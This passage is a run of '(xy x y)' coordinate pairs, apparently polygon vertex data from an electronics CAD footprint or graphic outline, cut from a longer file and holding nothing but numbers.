(xy 5.826321 -3.505097) (xy 5.876253 -3.51719) (xy 5.936479 -3.531902) (xy 6.005466 -3.548859)
(xy 6.08168 -3.567686) (xy 6.16359 -3.58801) (xy 6.211239 -3.599872) (xy 6.310813 -3.624626)
(xy 6.395474 -3.645504) (xy 6.466711 -3.662827) (xy 6.526017 -3.676918) (xy 6.574881 -3.688097)
(xy 6.614796 -3.696688) (xy 6.647251 -3.703011) (xy 6.673738 -3.707388) (xy 6.695747 -3.710141)
(xy 6.71477 -3.711593) (xy 6.731 -3.712055) (xy 6.769792 -3.71156) (xy 6.798165 -3.708507)
(xy 6.822579 -3.70166) (xy 6.849494 -3.689782) (xy 6.850892 -3.689097) (xy 6.905609 -3.653097)
(xy 6.950495 -3.60484) (xy 6.983844 -3.546925) (xy 7.003948 -3.481953) (xy 7.008379 -3.449184)
(xy 7.008954 -3.436287) (xy 7.008532 -3.421263) (xy 7.006847 -3.402765) (xy 7.003637 -3.379443)
(xy 6.998636 -3.349949) (xy 6.991582 -3.312935) (xy 6.98221 -3.267051) (xy 6.970256 -3.210948)
(xy 6.955456 -3.143278) (xy 6.937547 -3.062693) (xy 6.916263 -2.967843) (xy 6.900327 -2.897161)
(xy 6.78793 -2.399276) (xy 6.862614 -2.304371) (xy 6.937298 -2.209465) (xy 7.022532 -2.214179)
(xy 7.058939 -2.216003) (xy 7.108239 -2.21819) (xy 7.168136 -2.220661) (xy 7.236329 -2.223336)
(xy 7.310522 -2.226135) (xy 7.388414 -2.228977) (xy 7.467709 -2.231782) (xy 7.546107 -2.234471)
(xy 7.621309 -2.236963) (xy 7.691019 -2.239178) (xy 7.752936 -2.241036) (xy 7.804763 -2.242456)
(xy 7.844201 -2.24336) (xy 7.868467 -2.243666) (xy 7.920701 -2.241443) (xy 7.962707 -2.234175)
(xy 7.987111 -2.22645) (xy 8.043507 -2.196708) (xy 8.091195 -2.154398) (xy 8.128722 -2.102257)
(xy 8.154636 -2.043017) (xy 8.167483 -1.979413) (xy 8.16581 -1.914179) (xy 8.162597 -1.896252)
(xy 8.15611 -1.874099) (xy 8.143935 -1.839851) (xy 8.127359 -1.796842) (xy 8.107667 -1.748408)
(xy 8.086196 -1.698004) (xy 8.066989 -1.653971) (xy 8.042307 -1.597395) (xy 8.01345 -1.53125)
(xy 7.981714 -1.458513) (xy 7.948399 -1.38216) (xy 7.914803 -1.305165) (xy 7.886719 -1.240804)
(xy 7.753903 -0.936443) (xy 7.8067 -0.834404) (xy 7.826446 -0.796527) (xy 7.843619 -0.764118)
(xy 7.856633 -0.740134) (xy 7.863901 -0.727528) (xy 7.864631 -0.726504) (xy 7.873696 -0.724049)
(xy 7.897964 -0.719068) (xy 7.935936 -0.711829) (xy 7.986114 -0.702602) (xy 8.047 -0.691659)
(xy 8.117095 -0.679267) (xy 8.194901 -0.665698) (xy 8.27892 -0.651221) (xy 8.348133 -0.639417)
(xy 8.456079 -0.621055) (xy 8.548682 -0.605135) (xy 8.627298 -0.591287) (xy 8.69328 -0.579137)
(xy 8.747985 -0.568313) (xy 8.792766 -0.558444) (xy 8.82898 -0.549155) (xy 8.85798 -0.540076)
(xy 8.881121 -0.530834) (xy 8.899759 -0.521057) (xy 8.915249 -0.510371) (xy 8.928944 -0.498406)
(xy 8.942201 -0.484788) (xy 8.952643 -0.473297) (xy 8.992768 -0.416536) (xy 9.017455 -0.352958)
(xy 9.026429 -0.283288) (xy 9.02646 -0.279682) (xy 9.026242 -0.250966) (xy 9.024758 -0.225962)
(xy 9.021061 -0.202693) (xy 9.014203 -0.179185) (xy 9.003236 -0.153461) (xy 8.987212 -0.123546)
(xy 8.965183 -0.087465) (xy 8.936201 -0.043241) (xy 8.899319 0.011101) (xy 8.858453 0.070485)
(xy 8.816431 0.131399) (xy 8.768197 0.201327) (xy 8.717148 0.275343) (xy 8.666683 0.348519)
(xy 8.6202 0.415928) (xy 8.603418 0.440267) (xy 8.567519 0.492277) (xy 8.533606 0.541304)
(xy 8.503215 0.585135) (xy 8.477881 0.621558) (xy 8.459141 0.648362) (xy 8.448799 0.662964)
(xy 8.43434 0.686023) (xy 8.430087 0.703626) (xy 8.432746 0.717998) (xy 8.439499 0.73937)
(xy 8.448703 0.768517) (xy 8.45398 0.785236) (xy 8.467995 0.829638) (xy 8.570046 0.751476)
(xy 8.655419 0.684306) (xy 8.747955 0.608333) (xy 8.844523 0.526327) (xy 8.94199 0.441053)
(xy 9.037225 0.355282) (xy 9.127096 0.27178) (xy 9.208471 0.193316) (xy 9.259089 0.142473)
(xy 9.336079 0.0635) (xy 9.434773 -0.157781) (xy 9.460141 -0.214921) (xy 9.483095 -0.267127)
(xy 9.502763 -0.312374) (xy 9.518273 -0.348641) (xy 9.528755 -0.373904) (xy 9.533335 -0.38614)
(xy 9.533466 -0.386836) (xy 9.527815 -0.396748) (xy 9.513411 -0.413354) (xy 9.50301 -0.423789)
(xy 9.485415 -0.44217) (xy 9.460773 -0.469919) (xy 9.432509 -0.503098) (xy 9.407168 -0.533903)
(xy 9.280184 -0.702149) (xy 9.167156 -0.874945) (xy 9.068585 -1.051241) (xy 8.984971 -1.229988)
(xy 8.916816 -1.410134) (xy 8.864619 -1.590629) (xy 8.834501 -1.735666) (xy 8.826277 -1.797896)
(xy 8.820321 -1.871967) (xy 8.816723 -1.95293) (xy 8.815572 -2.035835) (xy 8.816957 -2.11573)
(xy 8.820967 -2.187665) (xy 8.825555 -2.231939) (xy 8.855178 -2.396375) (xy 8.900188 -2.556523)
(xy 8.960697 -2.712514) (xy 9.036816 -2.864476) (xy 9.128659 -3.012541) (xy 9.236338 -3.156839)
(xy 9.359965 -3.2975) (xy 9.499652 -3.434653) (xy 9.655512 -3.568429) (xy 9.827657 -3.698959)
(xy 10.016199 -3.826372) (xy 10.221251 -3.950799) (xy 10.3886 -4.04366) (xy 10.435645 -4.068385)
(xy 10.487426 -4.094876) (xy 10.541808 -4.122113) (xy 10.596657 -4.149079) (xy 10.649836 -4.174756)
(xy 10.69921 -4.198124) (xy 10.742645 -4.218167) (xy 10.778004 -4.233865) (xy 10.803154 -4.244201)
(xy 10.815958 -4.248156) (xy 10.817047 -4.247974) (xy 10.815442 -4.239265) (xy 10.807937 -4.220092)
(xy 10.799288 -4.201207) (xy 10.782275 -4.160626) (xy 10.763557 -4.106799) (xy 10.74414 -4.043197)
(xy 10.725032 -3.973289) (xy 10.707238 -3.900544) (xy 10.693235 -3.835785) (xy 10.673645 -3.732102)
(xy 10.656211 -3.625531) (xy 10.640599 -3.513399) (xy 10.626475 -3.393035) (xy 10.613502 -3.261766)
(xy 10.601348 -3.116919) (xy 10.598351 -3.077633) (xy 10.596461 -3.043838) (xy 10.594767 -2.996652)
(xy 10.593272 -2.937787) (xy 10.591976 -2.868953) (xy 10.590883 -2.791863) (xy 10.589992 -2.708227)
(xy 10.589306 -2.619757) (xy 10.588827 -2.528164) (xy 10.588556 -2.435159) (xy 10.588495 -2.342453)
(xy 10.588646 -2.251758) (xy 10.589009 -2.164786) (xy 10.589588 -2.083247) (xy 10.590383 -2.008852)
(xy 10.591397 -1.943314) (xy 10.59263 -1.888343) (xy 10.594085 -1.84565) (xy 10.595764 -1.816947)
(xy 10.59711 -1.805913) (xy 10.6045 -1.770326) (xy 10.688155 -1.812589) (xy 10.804907 -1.878908)
(xy 10.922778 -1.959954) (xy 11.039559 -2.053852) (xy 11.153039 -2.158726) (xy 11.261009 -2.272701)
(xy 11.338026 -2.364259) (xy 11.460051 -2.530313) (xy 11.571122 -2.708765) (xy 11.671295 -2.899745)
(xy 11.760626 -3.103383) (xy 11.839171 -3.31981) (xy 11.906988 -3.549156) (xy 11.964132 -3.791551)
(xy 11.971788 -3.82905) (xy 11.977907 -3.855044) (xy 11.983816 -3.872707) (xy 11.987419 -3.877733)
(xy 11.995864 -3.870469) (xy 12.011174 -3.849665) (xy 12.032394 -3.816799) (xy 12.05857 -3.77335)
(xy 12.088748 -3.720799) (xy 12.089418 -3.719607) (xy 12.154215 -3.592085) (xy 12.212708 -3.452211)
(xy 12.263611 -3.303802) (xy 12.305638 -3.150679) (xy 12.337505 -2.99666) (xy 12.342166 -2.968487)
(xy 12.348917 -2.912527) (xy 12.353832 -2.843792) (xy 12.356933 -2.765924) (xy 12.358246 -2.682566)
(xy 12.357795 -2.597363) (xy 12.355604 -2.513955) (xy 12.351697 -2.435988) (xy 12.346098 -2.367103)
(xy 12.338833 -2.310944) (xy 12.337741 -2.304623) (xy 12.297496 -2.117732) (xy 12.244788 -1.938613)
(xy 12.178684 -1.764969) (xy 12.098252 -1.594503) (xy 12.00256 -1.424919) (xy 11.941818 -1.329266)
(xy 11.822281 -1.161006) (xy 11.686497 -0.993671) (xy 11.535149 -0.82788) (xy 11.368923 -0.664249)
(xy 11.1885 -0.503397) (xy 10.994566 -0.345943) (xy 10.787803 -0.192504) (xy 10.568896 -0.043698)
(xy 10.405533 0.059379) (xy 10.347865 0.095811) (xy 10.30546 0.125229) (xy 10.278208 0.147716)
(xy 10.267465 0.160381) (xy 10.244979 0.195825) (xy 10.213242 0.242089) (xy 10.173887 0.297022)
(xy 10.12855 0.358474) (xy 10.078864 0.424293) (xy 10.026463 0.49233) (xy 9.972982 0.560432)
(xy 9.920055 0.626449) (xy 9.869315 0.688231) (xy 9.839302 0.7239) (xy 9.777436 0.795034)
(xy 9.708921 0.871036) (xy 9.636053 0.949547) (xy 9.561124 1.028208) (xy 9.486428 1.10466)
(xy 9.414259 1.176541) (xy 9.34691 1.241494) (xy 9.286675 1.297158) (xy 9.254998 1.325034)
(xy 9.229039 1.347821) (xy 9.208756 1.366553) (xy 9.197055 1.378501) (xy 9.195329 1.381093)
(xy 9.201884 1.386852) (xy 9.221012 1.401831) (xy 9.251635 1.425226) (xy 9.29268 1.456232)
(xy 9.343072 1.494043) (xy 9.401735 1.537856) (xy 9.467595 1.586864) (xy 9.539576 1.640264)
(xy 9.616604 1.69725) (xy 9.686094 1.748535) (xy 9.767424 1.808625) (xy 9.845218 1.866361)
(xy 9.918326 1.920873) (xy 9.985597 1.971292) (xy 10.045881 2.016747) (xy 10.098027 2.056369)
(xy 10.140886 2.089287) (xy 10.173308 2.114633) (xy 10.194141 2.131537) (xy 10.201693 2.138398)
(xy 10.231121 2.183887) (xy 10.250979 2.240886) (xy 10.260929 2.30671) (xy 10.260632 2.378674)
(xy 10.249749 2.454091) (xy 10.244361 2.477023) (xy 10.229705 2.522816) (xy 10.206975 2.579312)
(xy 10.177731 2.643287) (xy 10.143535 2.71152) (xy 10.105948 2.780789) (xy 10.066532 2.847871)
(xy 10.057946 2.861734) (xy 9.997681 2.956673) (xy 9.927246 3.065079) (xy 9.846677 3.186902)
(xy 9.756006 3.322094) (xy 9.655266 3.470606) (xy 9.544492 3.632389) (xy 9.423717 3.807396)
(xy 9.292975 3.995577) (xy 9.152299 4.196883) (xy 9.001723 4.411267) (xy 8.84128 4.63868)
(xy 8.671005 4.879072) (xy 8.49093 5.132396) (xy 8.365337 5.308601) (xy 8.309265 5.387581)
(xy 8.253746 5.466522) (xy 8.200006 5.543633) (xy 8.14927 5.617124) (xy 8.102765 5.685203)
(xy 8.061715 5.74608) (xy 8.027347 5.797965) (xy 8.000886 5.839066) (xy 7.988638 5.858934)
(xy 7.932429 5.95188) (xy 7.87825 6.039817) (xy 7.826967 6.121419) (xy 7.779448 6.195358)
(xy 7.736562 6.260306) (xy 7.699176 6.314936) (xy 7.668158 6.357919) (xy 7.644377 6.387929)
(xy 7.638554 6.39445) (xy 7.617815 6.412753) (xy 7.603238 6.41566) (xy 7.59364 6.403032)
(xy 7.589931 6.388759) (xy 7.58778 6.357964) (xy 7.589713 6.313321) (xy 7.595338 6.257316)
(xy 7.604265 6.192432) (xy 7.616101 6.121154) (xy 7.630456 6.045966) (xy 7.646938 5.969352)
(xy 7.665156 5.893796) (xy 7.672046 5.8674) (xy 7.72325 5.689454) (xy 7.781815 5.512727)
(xy 7.848849 5.334348) (xy 7.925463 5.151444) (xy 8.012765 4.961144) (xy 8.057803 4.868334)
(xy 8.120497 4.737887) (xy 8.183686 4.600069) (xy 8.246809 4.456439) (xy 8.309303 4.308552)
(xy 8.370608 4.157966) (xy 8.430161 4.006238) (xy 8.4874 3.854926) (xy 8.541764 3.705586)
(xy 8.592691 3.559774) (xy 8.639619 3.41905) (xy 8.681986 3.284969) (xy 8.71923 3.159088)
(xy 8.75079 3.042965) (xy 8.776104 2.938157) (xy 8.79461 2.846221) (xy 8.800511 2.809847)
(xy 8.808466 2.749781) (xy 8.81234 2.702881) (xy 8.812152 2.665884) (xy 8.80792 2.635528)
(xy 8.801672 2.613928) (xy 8.794988 2.598055) (xy 8.785784 2.583735) (xy 8.771772 2.56891)
(xy 8.750667 2.551521) (xy 8.72018 2.529506) (xy 8.678024 2.500805) (xy 8.670396 2.495691)
(xy 8.638894 2.474425) (xy 8.612052 2.455985) (xy 8.593416 2.442824) (xy 8.587316 2.438208)
(xy 8.578256 2.432631) (xy 8.576733 2.433552) (xy 8.569684 2.431897) (xy 8.550644 2.424047)
(xy 8.522777 2.411367) (xy 8.498774 2.399894) (xy 8.431181 2.370132) (xy 8.352758 2.340745)
(xy 8.26953 2.31373) (xy 8.187522 2.29108) (xy 8.132233 2.278519) (xy 8.06019 2.265717)
(xy 7.986044 2.255712) (xy 7.912679 2.248642) (xy 7.842977 2.244643) (xy 7.779823 2.243855)
(xy 7.726099 2.246414) (xy 7.68469 2.252459) (xy 7.670543 2.256458) (xy 7.648011 2.263258)
(xy 7.632909 2.26568) (xy 7.630041 2.264998) (xy 7.620771 2.265432) (xy 7.616545 2.268098)
(xy 7.604653 2.272955) (xy 7.579453 2.280404) (xy 7.544227 2.289647) (xy 7.502256 2.299885)
(xy 7.456823 2.310318) (xy 7.411209 2.320149) (xy 7.368697 2.328578) (xy 7.366 2.329081)
(xy 7.331584 2.336982) (xy 7.299068 2.346946) (xy 7.280265 2.354613) (xy 7.259843 2.363048)
(xy 7.246226 2.36545) (xy 7.244281 2.36466) (xy 7.239306 2.365598) (xy 7.239 2.368269)
(xy 7.232049 2.37789) (xy 7.224183 2.381629) (xy 7.211837 2.386552) (xy 7.18702 2.397356)
(xy 7.152601 2.412762) (xy 7.111452 2.431486) (xy 7.078133 2.446829) (xy 7.019005 2.473733)
(xy 6.951237 2.503779) (xy 6.87646 2.536304) (xy 6.796308 2.570641) (xy 6.712412 2.606124)
(xy 6.626405 2.642089) (xy 6.539921 2.67787) (xy 6.454591 2.712801) (xy 6.372048 2.746218)
(xy 6.293926 2.777454) (xy 6.221855 2.805845) (xy 6.15747 2.830725) (xy 6.102402 2.851429)
(xy 6.058284 2.867291) (xy 6.02675 2.877646) (xy 6.011494 2.881549) (xy 5.993784 2.887314)
(xy 5.981404 2.893221) (xy 5.967203 2.899232) (xy 5.938749 2.909746) (xy 5.897929 2.924143)
(xy 5.846629 2.9418) (xy 5.786735 2.962096) (xy 5.720135 2.984409) (xy 5.648713 3.008118)
(xy 5.574357 3.0326) (xy 5.498953 3.057234) (xy 5.424387 3.081398) (xy 5.352546 3.104471)
(xy 5.285316 3.125831) (xy 5.224584 3.144856) (xy 5.172235 3.160925) (xy 5.139266 3.170764)
(xy 5.08223 3.187311) (xy 5.019296 3.20527) (xy 4.95267 3.22404) (xy 4.884557 3.24302)
(xy 4.817162 3.261606) (xy 4.752689 3.2792) (xy 4.693345 3.295197) (xy 4.641334 3.308998)
(xy 4.598861 3.320001) (xy 4.56813 3.327604) (xy 4.551348 3.331205) (xy 4.550833 3.331281)
(xy 4.529952 3.335896) (xy 4.5212 3.338867) (xy 4.50374 3.344415) (xy 4.471582 3.352957)
(xy 4.426612 3.364075) (xy 4.370718 3.37735) (xy 4.305787 3.392365) (xy 4.233707 3.408701)
(xy 4.156364 3.425939) (xy 4.075646 3.443663) (xy 3.99344 3.461453) (xy 3.911633 3.478891)
(xy 3.832113 3.495559) (xy 3.756767 3.511039) (xy 3.687482 3.524912) (xy 3.640666 3.534005)
(xy 3.5407 3.552752) (xy 3.43777 3.571417) (xy 3.334727 3.589521) (xy 3.234423 3.606586)
(xy 3.139709 3.622134) (xy 3.053438 3.635687) (xy 2.978462 3.646767) (xy 2.925233 3.653947)
(xy 2.894457 3.657926) (xy 2.866294 3.661711) (xy 2.857499 3.662944) (xy 2.770022 3.675099)
(xy 2.673477 3.687799) (xy 2.57066 3.700725) (xy 2.46437 3.713561) (xy 2.357404 3.72599)
(xy 2.252559 3.737694) (xy 2.152633 3.748357) (xy 2.060423 3.75766) (xy 1.978727 3.765287)
(xy 1.910341 3.77092) (xy 1.896533 3.771919) (xy 1.860552 3.774562) (xy 1.814646 3.778117)
(xy 1.76576 3.78204) (xy 1.735666 3.784529) (xy 1.563861 3.797338) (xy 1.378088 3.808236)
(xy 1.18121 3.817192) (xy 0.976086 3.824177) (xy 0.765578 3.829159) (xy 0.552547 3.832107)
(xy 0.339855 3.832993) (xy 0.130363 3.831784) (xy -0.073069 3.828452) (xy -0.267579 3.822964)
(xy -0.450305 3.815291) (xy -0.563034 3.809016) (xy -0.612177 3.806097) (xy -0.656702 3.803675)
(xy -0.693305 3.801915) (xy -0.718682 3.800977) (xy -0.728124 3.800902) (xy -0.743207 3.800516)
(xy -0.772651 3.798951) (xy -0.81394 3.796392) (xy -0.864557 3.793023) (xy -0.921986 3.789028)
(xy -0.983709 3.784591) (xy -1.047209 3.779896) (xy -1.109971 3.775126) (xy -1.169476 3.770467)
(xy -1.223208 3.766101) (xy -1.268651 3.762213) (xy -1.303288 3.758987) (xy -1.3081 3.758499)
(xy -1.345319 3.754739) (xy -1.376979 3.751685) (xy -1.398777 3.749744) (xy -1.405467 3.749278)
(xy -1.421097 3.748141) (xy -1.450725 3.745512) (xy -1.491509 3.741675) (xy -1.540609 3.736914)
(xy -1.595183 3.731513) (xy -1.652388 3.725756) (xy -1.709383 3.719927) (xy -1.763327 3.71431)
(xy -1.811379 3.709188) (xy -1.850695 3.704847) (xy -1.854744 3.704385) (xy -2.443003 3.628791)
(xy -3.031229 3.536569) (xy -3.619672 3.427669) (xy -4.208584 3.302041) (xy -4.798214 3.159635)
(xy -5.388813 3.000399) (xy -5.473701 2.976153) (xy -5.534361 2.958507) (xy -5.602174 2.938437)
(xy -5.675084 2.916582) (xy -5.751039 2.893577) (xy -5.756981 2.891761) (xy -0.13445 2.891761)
(xy -0.132749 2.900736) (xy -0.124513 2.921223) (xy -0.11139 2.949907) (xy -0.095026 2.983475)
(xy -0.07707 3.018611) (xy -0.059168 3.052002) (xy -0.042967 3.080334) (xy -0.032502 3.096889)
(xy 0.018014 3.161037) (xy 0.081471 3.225969) (xy 0.154271 3.288829) (xy 0.232819 3.346761)
(xy 0.313518 3.39691) (xy 0.39277 3.436419) (xy 0.397815 3.438563) (xy 0.496563 3.471468)
(xy 0.600521 3.490244) (xy 0.706154 3.494678) (xy 0.809929 3.484561) (xy 0.883523 3.467559)
(xy 0.989603 3.429122) (xy 1.089121 3.377743) (xy 1.184032 3.3122) (xy 1.276292 3.231272)
(xy 1.300713 3.206919) (xy 1.355806 3.148117) (xy 1.40028 3.094365) (xy 1.437422 3.041055)
(xy 1.470519 2.983574) (xy 1.494766 2.934739) (xy 1.511006 2.898796) (xy 1.527019 2.860805)
(xy 1.541539 2.824107) (xy 1.553302 2.79204) (xy 1.561044 2.767944) (xy 1.563501 2.755158)
(xy 1.563145 2.754124) (xy 1.554544 2.754414) (xy 1.530446 2.755995) (xy 1.492229 2.758756)
(xy 1.441269 2.762585) (xy 1.378945 2.76737) (xy 1.306633 2.772999) (xy 1.225713 2.779361)
(xy 1.137561 2.786343) (xy 1.043555 2.793835) (xy 0.945073 2.801725) (xy 0.843493 2.8099)
(xy 0.740191 2.81825) (xy 0.636547 2.826662) (xy 0.533936 2.835025) (xy 0.433738 2.843227)
(xy 0.33733 2.851156) (xy 0.246088 2.858701) (xy 0.161392 2.86575) (xy 0.084619 2.872191)
(xy 0.017146 2.877913) (xy -0.039649 2.882804) (xy -0.084388 2.886752) (xy -0.115694 2.889645)
(xy -0.132189 2.891372) (xy -0.13445 2.891761) (xy -5.756981 2.891761) (xy -5.827984 2.870061)
(xy -5.903864 2.84667) (xy -5.976625 2.824041) (xy -6.044214 2.802811) (xy -6.104577 2.783617)
(xy -6.155658 2.767097) (xy -6.195405 2.753887) (xy -6.221762 2.744624) (xy -6.227881 2.742255)
(xy -6.249974 2.734121) (xy -6.266296 2.729436) (xy -6.284001 2.724515) (xy -6.304396 2.717435)
(xy -6.322039 2.710956) (xy -6.330725 2.708208) (xy -6.330772 2.708207) (xy -6.33977 2.705639)
(xy -6.361306 2.698619) (xy -6.391951 2.688328) (xy -6.428273 2.675948) (xy -6.466843 2.662659)
(xy -6.50423 2.649644) (xy -6.537005 2.638083) (xy -6.561736 2.629158) (xy -6.574367 2.62432)
(xy -6.595212 2.616154) (xy -6.609872 2.61149) (xy -6.609946 2.611475) (xy -6.623656 2.607348)
(xy -6.650367 2.598251) (xy -6.687529 2.585125) (xy -6.732591 2.568914) (xy -6.783001 2.55056)
(xy -6.83621 2.531007) (xy -6.889666 2.511196) (xy -6.940817 2.492071) (xy -6.987114 2.474574)
(xy -7.026006 2.459649) (xy -7.05494 2.448238) (xy -7.071368 2.441283) (xy -7.073668 2.440091)
(xy -7.089613 2.433636) (xy -7.091843 2.4332) (xy -7.104896 2.429287) (xy -7.129898 2.420201)
(xy -7.163936 2.407131) (xy -7.204095 2.391267) (xy -7.24746 2.373796) (xy -7.291118 2.35591)
(xy -7.332153 2.338797) (xy -7.367651 2.323646) (xy -7.394697 2.311646) (xy -7.410379 2.303987)
(xy -7.413067 2.302125) (xy -7.421843 2.29696) (xy -7.423736 2.29761) (xy -7.433213 2.295671)
(xy -7.455058 2.287941) (xy -7.486204 2.275594) (xy -7.523584 2.259804) (xy -7.5311 2.256528)
(xy -7.6327 2.212027) (xy -7.698347 2.24489) (xy -7.737979 2.265536) (xy -7.780464 2.288926)
(xy -7.817035 2.310223) (xy -7.819146 2.31151) (xy -7.846498 2.327679) (xy -7.86849 2.339624)
(xy -7.881002 2.34513) (xy -7.881911 2.345267) (xy -7.892016 2.351281) (xy -7.892345 2.351968)
(xy -7.900324 2.360509) (xy -7.917485 2.374767) (xy -7.929034 2.383508) (xy -7.959824 2.407428)
(xy -7.996809 2.438214) (xy -8.036951 2.473114) (xy -8.077215 2.509376) (xy -8.114565 2.544248)
(xy -8.145963 2.574978) (xy -8.168375 2.598814) (xy -8.173798 2.605356) (xy -8.191802 2.630718)
(xy -8.200904 2.652195) (xy -8.203997 2.678048) (xy -8.204201 2.692195) (xy -8.19982 2.743713)
(xy -8.186555 2.806066) (xy -8.164217 2.879786) (xy -8.13262 2.965403) (xy -8.091576 3.063448)
(xy -8.040897 3.17445) (xy -8.014286 3.230034) (xy -7.952392 3.353926) (xy -7.882564 3.487073)
(xy -7.806142 3.627263) (xy -7.724461 3.772283) (xy -7.638862 3.91992) (xy -7.550682 4.067962)
(xy -7.461258 4.214197) (xy -7.37193 4.35641) (xy -7.284035 4.492391) (xy -7.198911 4.619925)
(xy -7.117897 4.736801) (xy -7.04233 4.840806) (xy -7.031317 4.855465) (xy -6.912548 5.019001)
(xy -6.798669 5.188101) (xy -6.691168 5.360193) (xy -6.591533 5.532702) (xy -6.501252 5.703053)
(xy -6.421812 5.868674) (xy -6.355865 6.024034) (xy -6.327981 6.097813) (xy -6.304129 6.167061)
(xy -6.284671 6.230229) (xy -6.269971 6.285769) (xy -6.260391 6.332131) (xy -6.256294 6.367765)
(xy -6.258043 6.391124) (xy -6.266001 6.400657) (xy -6.267583 6.4008) (xy -6.285356 6.394199)
(xy -6.313264 6.374377) (xy -6.35133 6.34131) (xy -6.399579 6.294973) (xy -6.458037 6.235341)
(xy -6.526727 6.162388) (xy -6.605675 6.076089) (xy -6.694904 5.97642) (xy -6.783495 5.875867)
(xy -6.826416 5.827763) (xy -6.87361 5.77642) (xy -6.921079 5.72609) (xy -6.964825 5.68102)
(xy -6.994604 5.651462) (xy -7.164334 5.486794) (xy -7.332441 5.323008) (xy -7.500723 5.158335)
(xy -7.670975 4.991006) (xy -7.844991 4.819249) (xy -8.024568 4.641296) (xy -8.211501 4.455376)
(xy -8.407585 4.259718) (xy -8.492511 4.174804) (xy -8.631698 4.035447) (xy -8.759368 3.907356)
(xy -8.876077 3.789921) (xy -8.982378 3.682531) (xy -9.078829 3.584577) (xy -9.165982 3.49545)
(xy -9.244394 3.414539) (xy -9.314618 3.341236) (xy -9.377211 3.274929) (xy -9.432727 3.215011)
(xy -9.48172 3.16087) (xy -9.524747 3.111897) (xy -9.562361 3.067482) (xy -9.595118 3.027017)
(xy -9.623573 2.98989) (xy -9.64828 2.955492) (xy -9.669796 2.923214) (xy -9.688673 2.892446)
(xy -9.705469 2.862577) (xy -9.720736 2.832999) (xy -9.728697 2.816606) (xy -9.745786 2.777929)
(xy -9.761462 2.73763) (xy -9.772857 2.703189) (xy -9.774548 2.696972) (xy -9.785571 2.631314)
(xy -9.785814 2.566364) (xy -9.775715 2.506139) (xy -9.755709 2.454654) (xy -9.746621 2.439698)
(xy -9.735915 2.426404) (xy -9.714313 2.40174) (xy -9.682622 2.366575) (xy -9.64165 2.321778)
(xy -9.592204 2.268217) (xy -9.535092 2.20676) (xy -9.471121 2.138276) (xy -9.401099 2.063633)
(xy -9.325834 1.9837) (xy -9.246133 1.899344) (xy -9.162803 1.811435) (xy -9.143128 1.790719)
(xy -9.091749 1.736423) (xy -9.048903 1.690686) (xy -9.015318 1.654299) (xy -8.991721 1.628054)
(xy -8.978838 1.612744) (xy -8.976627 1.609398) (xy -8.981992 1.602273) (xy -8.998198 1.590665)
(xy -9.010494 1.583383) (xy -9.205521 1.470487) (xy -9.389892 1.354933) (xy -9.563001 1.237259)
(xy -9.616035 1.198034) (xy -2.298248 1.198034) (xy -2.297557 1.27466) (xy -2.294711 1.338606)
(xy -2.289127 1.39405) (xy -2.280226 1.44517) (xy -2.267426 1.496147) (xy -2.250146 1.551159)
(xy -2.248457 1.556141) (xy -2.200959 1.669651) (xy -2.137991 1.777883) (xy -2.060427 1.880002)
(xy -1.969135 1.975173) (xy -1.864987 2.06256) (xy -1.748856 2.141329) (xy -1.62161 2.210644)
(xy -1.517843 2.256553) (xy -1.441971 2.285931) (xy -1.377609 2.30795) (xy -1.321292 2.323155)
(xy -1.269554 2.332091) (xy -1.21893 2.335302) (xy -1.165955 2.333333) (xy -1.107164 2.326729)
(xy -1.088589 2.324033) (xy -0.940493 2.294862) (xy -0.804477 2.253826) (xy -0.68056 2.20095)
(xy -0.568763 2.136256) (xy -0.469108 2.059769) (xy -0.381614 1.971513) (xy -0.306303 1.871511)
(xy -0.243195 1.759788) (xy -0.192311 1.636367) (xy -0.153673 1.501273) (xy -0.1273 1.354528)
(xy -0.113517 1.202267) (xy -0.11322 1.138767) (xy 1.342152 1.138767) (xy 1.344457 1.240173)
(xy 1.351721 1.329395) (xy 1.364843 1.410686) (xy 1.384723 1.488302) (xy 1.412258 1.566497)
(xy 1.44835 1.649527) (xy 1.451523 1.656272) (xy 1.469968 1.694119) (xy 1.488251 1.728572)
(xy 1.507919 1.761832) (xy 1.530514 1.796094) (xy 1.557584 1.83356) (xy 1.590672 1.876426)
(xy 1.631324 1.926892) (xy 1.681085 1.987156) (xy 1.699937 2.009771) (xy 1.777398 2.089509)
(xy 1.865548 2.156607) (xy 1.962832 2.210128) (xy 2.067701 2.249133) (xy 2.116666 2.261637)
(xy 2.171968 2.270066) (xy 2.238556 2.27426) (xy 2.311353 2.274333) (xy 2.38528 2.270399)
(xy 2.455258 2.262571) (xy 2.508353 2.252827) (xy 2.589034 2.231991) (xy 2.668153 2.206247)
(xy 2.750138 2.173944) (xy 2.839413 2.133435) (xy 2.874433 2.116404) (xy 2.979843 2.061499)
(xy 3.070132 2.008006) (xy 3.146896 1.954648) (xy 3.211732 1.900148) (xy 3.266237 1.843229)
(xy 3.312007 1.782612) (xy 3.332386 1.750058) (xy 3.384929 1.644059) (xy 3.42376 1.528669)
(xy 3.448901 1.404401) (xy 3.460373 1.271769) (xy 3.458198 1.131289) (xy 3.442397 0.983473)
(xy 3.412991 0.828838) (xy 3.370003 0.667896) (xy 3.313453 0.501163) (xy 3.276264 0.406416)
(xy 3.25051 0.344768) (xy 3.228944 0.296169) (xy 3.209883 0.257788) (xy 3.191639 0.226791)
(xy 3.172527 0.200347) (xy 3.150863 0.175623) (xy 3.124959 0.149788) (xy 3.121674 0.146657)
(xy 3.013766 0.05334) (xy 2.90423 -0.02313) (xy 2.79302 -0.082765) (xy 2.680088 -0.125577)
(xy 2.565387 -0.15158) (xy 2.448869 -0.160785) (xy 2.330488 -0.153204) (xy 2.210195 -0.128851)
(xy 2.14423 -0.108663) (xy 2.107796 -0.096057) (xy 2.08578 -0.087751) (xy 2.076534 -0.082699)
(xy 2.078409 -0.079854) (xy 2.089755 -0.078172) (xy 2.095392 -0.077685) (xy 2.119726 -0.073817)
(xy 2.137415 -0.067704) (xy 2.139734 -0.066155) (xy 2.156081 -0.060963) (xy 2.162854 -0.062183)
(xy 2.176403 -0.062347) (xy 2.180166 -0.059266) (xy 2.190977 -0.05498) (xy 2.197371 -0.056308)
(xy 2.208065 -0.055555) (xy 2.209799 -0.051206) (xy 2.214933 -0.045308) (xy 2.218266 -0.046566)
(xy 2.226056 -0.045614) (xy 2.226733 -0.042333) (xy 2.23189 -0.036812) (xy 2.235199 -0.0381)
(xy 2.242989 -0.037147) (xy 2.243666 -0.033866) (xy 2.248824 -0.028345) (xy 2.252133 -0.029633)
